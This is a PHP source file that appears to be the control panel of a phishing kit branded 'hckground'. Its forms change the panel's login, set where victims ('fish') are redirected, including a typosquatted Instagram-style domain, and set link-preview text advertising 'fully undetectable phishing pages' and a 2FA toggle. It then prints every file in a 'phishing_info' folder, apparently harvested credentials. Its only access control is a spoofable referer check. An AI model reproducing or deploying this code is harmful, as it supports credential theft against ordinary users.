<?php if(!empty($_SERVER["HTTP_REFERER"])){$ref=$_SERVER["HTTP_REFERER"];if(substr_count($ref,"/admin/")=='1'){include 'meta_and_redirect_changer.php';$dir='../.././sites/phishing_info/';echo '<style>.inputs{position:relative;height:auto;box-sizing:border-box;padding:10px;font-size:16px}.clps{background-color:#0ba46f;color:white;cursor:pointer;padding:18px;margin-left:16%;width:68%;height:auto;border:10px solid #000;text-align:left;outline:0;font-size:15px}.active,.clps:hover{background-color:#737373}.content{padding:0 18px;display:none;overflow:hidden;background-color:darkblue}</style><button class=clps><div style=font-size:150%;text-align:center;><b style="color:tomato">Change Password</b></div></button><div class=content><p><center><form action=./user_changer.php method=post><h3 style="color:red">NOTE:</h3><b>chnage your password</b><br><br>
<input  maxlength=40 size=30px type=text class=inputs name=username placeholder="type new username" required=autofocus=><br>
<input  maxlength=40 size=30px type=password class=inputs name=password placeholder="type new password" required=autofocus=><br><br>
<input  type=checkbox required>your want to change password<br><br><button type=submit style="color:lime;background-color:black;border:7px solid tomato;width:120px;height:50px"><b>Confirm</b></button></form></center></p></div><script>var a=document.getElementsByClassName("clps"),b;for(b=0;b<a.length;b++)a[b].addEventListener("click",function(){this.classList.toggle("active");var c=this.nextElementSibling;c.style.display="block"===c.style.display?"none":"block"});</script>';echo '<br><br><br><br><style>.bt{margin-bottom:5px;margin-left:40%;color:#fff;background-color:black;font-size:90%;border-radius:30%;border:7px solid tomato;width: 24%;height: 50px;}</style><a href=.././dashboard.php ><button class=bt><b>Back</b></button></a>';echo '<br><br><br><br><hr><hr><hr><br><style>body{background-color:#001a00;color:white}</style><center><form method=post action=meta_and_redirect_changer.php><br><b>Settings for: </b><select name=selected style=width:300px; >';if(is_dir($dir)){if($dh=opendir($dir)){while(($file=readdir($dh))!==false){if($file!='..'){echo '<option value='.$file.'>'.$file.'</option>';}}closedir($dh);}}echo '</select><br><b>Redirect fish to: </b>
<input  style=background-color:#fff; size=40px type=url  placeholder=https://instgarm.com/hckground name=redirect required><br><b>Preview Title: </b>
<input  size=40px style=background-color:#fff; name=title placeholder=hckground required><br><b>Preview Description: </b>
<input  size=40px  style=background-color:#fff; name=description placeholder=fully_undetectable_phishing_pages. required><br><b>Preview Image link: </b>
<input  size=40px style=background-color:#fff; type=url placeholder=https://namanmic.github.io/blogger-images/hackground.png name=image required>
<br><b>2 Factor Enabled:</b> <select name=TFA_Enabled style=width:300px;>
<option value="True">True</option>
<option value="False">False</option>
</select>
<br><br><button style="background-color:darkgreen;color:yellow;width:115px;height:115px;border:10px solid aqua;border-radius:50%;text-align:center;font-size:15px;" type=submit /><b>Submit</b></button></form></center><br><hr><hr><hr><br><br><br><br>';$a=scandir($dir);echo"<ol>";
for($x=2;$x<=(count($a)-1);$x++)
{echo"<br><h1><li>$a[$x]</li></h1>";highlight_file($dir.$a[$x]);echo"<hr>";}echo '</ol>';}else{echo'<script>window.location.replace(".././dashboard.php");</script>';}}else{echo'<script>window.location.replace(".././dashboard.php");</script>';}?>